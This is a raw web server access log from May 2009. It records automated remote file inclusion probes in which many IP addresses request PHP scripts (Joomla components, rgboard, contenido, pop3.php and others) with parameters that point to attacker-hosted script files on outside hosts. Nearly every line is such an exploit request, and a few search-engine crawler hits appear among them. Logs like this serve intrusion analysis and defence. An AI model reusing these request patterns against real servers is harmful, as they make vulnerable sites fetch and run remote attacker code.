195.34.78.110 - - [30/May/2009:02:21:06 -0500] "GET /logs/access_log.1242172800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:02:21:07 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:02:21:07 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:02:21:07 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:02:21:07 -0500] "GET /logs/access_log.1242172800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
72.188.238.2 - - [30/May/2009:02:21:41 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
200.107.3.73 - - [30/May/2009:02:22:51 -0500] "GET /logs/errors.php?error=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.107.3.73 - - [30/May/2009:02:22:51 -0500] "GET /errors.php?error=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.34.78.110 - - [30/May/2009:02:23:20 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
195.34.78.110 - - [30/May/2009:02:23:22 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:24:25 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:24:25 -0500] "GET /logs/access_log.1242172800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:24:25 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:24:30 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:26:14 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:26:14 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:26:14 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:27:45 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:10 -0500] "GET /logs/access_log.1239494400//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:10 -0500] "GET /logs/access_log.1238112000//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:10 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:12 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
212.150.52.114 - - [30/May/2009:02:28:17 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.150.52.114 - - [30/May/2009:02:28:17 -0500] "GET /logs/access_log.1242086400//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
212.150.52.114 - - [30/May/2009:02:28:17 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
212.150.52.114 - - [30/May/2009:02:28:22 -0500] "GET /logs/access_log.1242432000//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:45 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:45 -0500] "GET /logs/access_log.1238112000//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:46 -0500] "GET /logs/access_log.1239494400//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:47 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:47 -0500] "GET /logs/access_log.1238112000//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:47 -0500] "GET /logs/access_log.1239494400//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:47 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:48 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:52 -0500] "GET /logs/access_log.1238112000//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:52 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:52 -0500] "GET /logs/access_log.1239494400//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:28:53 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
65.55.106.206 - - [30/May/2009:02:29:38 -0500] "GET /logs/access_log.1216857600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.111 - - [30/May/2009:02:30:08 -0500] "GET /logs/access_log.1126828800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.150.52.114 - - [30/May/2009:02:30:23 -0500] "GET /logs/access_log.1240531200//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:30:29 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:30:33 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:30:34 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:31:08 -0500] "GET /logs/access_log.1235433600//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:31:11 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:31:11 -0500] "GET //skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:02:32:01 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.232.54.48 - - [30/May/2009:02:32:10 -0500] "GET /logs/access_log.1235260800//skin/zero_vote/login.php?dir=http://oishi-x.my1.ru/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs/access_log.1240790400//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs/access_log.1240790400//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET /logs/access_log.1240790400//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:40 -0500] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:48 -0500] "GET //phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:48 -0500] "GET /logs//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:02:36:48 -0500] "GET /logs/access_log.1240790400//phphtml.php?htmlclass_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:38:44 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:40:24 -0500] "GET //?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:40:24 -0500] "GET /logs/access_log.1235433600//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:40:32 -0500] "GET /logs//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 200 77669 "-""Mozilla/5.0"
85.18.117.101 - - [30/May/2009:02:41:05 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:42:30 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:42:30 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:42:30 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:42:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 325 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:42:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 330 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:42:42 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:43:18 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:43:54 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:43:54 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:43:54 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:12 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 325 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 330 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:13 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:44:27 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:44:27 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:44:27 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:44:30 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 325 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 330 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:44:56 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
121.165.73.157 - - [30/May/2009:02:45:13 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:02:45:19 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 352 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:02:45:22 -0500] "GET /logs/access_log.1242259200/addons/guildbank/searcharrays.php?addonDir=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:02:45:22 -0500] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.249.36.194 - - [30/May/2009:02:45:22 -0500] "GET /addons/guildbank/searcharrays.php?addonDir=http://oishi-x.my1.ru/id1.txt????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:48:19 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:48:20 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:48:20 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:49:14 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:49:16 -0500] "GET /logs/access_log.1242432000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:49:18 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:02:49:20 -0500] "GET /logs/access_log.1242172800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:49:28 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:49:28 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:49:28 -0500] "GET /logs/access_log.1242432000/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:49:39 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:50:38 -0500] "GET /logs/access_log.1242172800/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.228.45.60 - - [30/May/2009:02:52:30 -0500] "GET /logs///include/mail.inc.php?skin_board_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:02:52:30 -0500] "GET ///include/mail.inc.php?skin_board_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
116.36.213.166 - - [30/May/2009:02:54:23 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:54:23 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:54:24 -0500] "GET /logs/access_log.1233878400/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:54:26 -0500] "GET /logs/access_log.1233705600/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:56:35 -0500] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:56:36 -0500] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:56:36 -0500] "GET /logs/access_log.1233878400/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:02:56:39 -0500] "GET /logs/access_log.1233705600/rgboard//include/mail.inc.php?skin_board_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:02:57:15 -0500] "GET /logs/access_log.1235433600//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:02:57:17 -0500] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:02:57:17 -0500] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 191354 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:02:58:10 -0500] "GET /logs/access_log.1235260800//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.106.234 - - [30/May/2009:02:58:38 -0500] "GET /logs/access_log.1177459200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
112.175.141.41 - - [30/May/2009:02:59:56 -0500] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
112.175.141.41 - - [30/May/2009:02:59:59 -0500] "GET /logs/access_log.1235433600//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
